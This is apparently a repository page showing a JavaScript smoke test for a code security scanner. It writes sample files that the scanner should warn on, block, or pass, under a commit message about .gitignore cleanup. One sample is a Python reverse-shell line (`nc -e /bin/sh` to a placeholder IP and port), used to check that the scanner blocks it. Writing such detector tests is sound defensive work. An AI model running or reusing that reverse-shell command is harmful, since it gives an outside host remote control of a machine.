Files
admin c1b5e4d966 chore(工作区): 全量入库 + 补齐 .gitignore(以工作区为准)
- 变更规模:新增 514 / 修改 62 / 重命名 155 / 删除 4(归档重组与文档轮次)
- .gitignore 修:`归档/**/db-cwd归一-备份-*/` —— 原规则写绝对层级(归档/db-cwd归一-…),
  目录搬进 归档/配置与备份/ 后**静默失效**,43 MB 的 DB 备份又变成未跟踪
- .gitignore 补:嵌套 git 内部数据(归档/内嵌git-20261008/、归档/skills-git-旧线-20261007/dotgit-原样移出/)
- .gitignore 补:运行态与部署副本(.workbuddy/collab/、.workbuddy/tools/、.workbuddy/.load-pending、.workbuddy/tmp-*)
- .gitignore 补:备份件(*.bak-*)
- 未跟踪文件从 2190 降到 890(其余为 归档/ 归档件与 .workbuddy/memory/ 知识文件,按口径入库)
2026-10-10 23:13:22 +08:00

22 lines
1.4 KiB
JavaScript

// 安全扫描分级冒烟(P0 阻断 / P1 告警)
const { mkdtempSync, writeFileSync, rmSync } = require('node:fs')
const { join } = require('node:path')
const { tmpdir } = require('node:os')
const { scanDir } = require('/opt/dshs/lib/web/security-scan.js')
const dir = mkdtempSync(join(tmpdir(), 'scan-smoke-'))
// ① P1 样例:动态执行 + 敏感 env(应告警不阻断)
writeFileSync(join(dir, 'a.js'), 'const cp = require("child_process");\nconst k = process.env.DEEPSEEK_API_KEY;\n')
let findings = []
try { findings = scanDir(dir) } catch (e) { console.log(' ❌ P1 样例被阻断(不该):', e.message.slice(0, 80)) }
console.log(' ① P1 样例 findings:', JSON.stringify(findings))
// ② P0 样例:反弹 shell(应阻断)
writeFileSync(join(dir, 'b.py'), 'import os\nos.system("nc -e /bin/sh 1.2.3.4 4444")\n')
try { scanDir(dir); console.log(' ❌ P0 样例未阻断(不该)') } catch (e) { console.log(' ✅ P0 样例已阻断:', e.message.slice(0, 90)) }
// ③ 良性样例:不应有任何 finding
const clean = mkdtempSync(join(tmpdir(), 'scan-clean-'))
writeFileSync(join(clean, 'ok.js'), 'export const hello = (n) => `hi ${n}`\n')
const cleanFindings = scanDir(clean)
console.log(' ② 良性样例 findings:', JSON.stringify(cleanFindings), cleanFindings.length === 0 ? '✅' : '❌')
rmSync(dir, { recursive: true, force: true }); rmSync(clean, { recursive: true, force: true })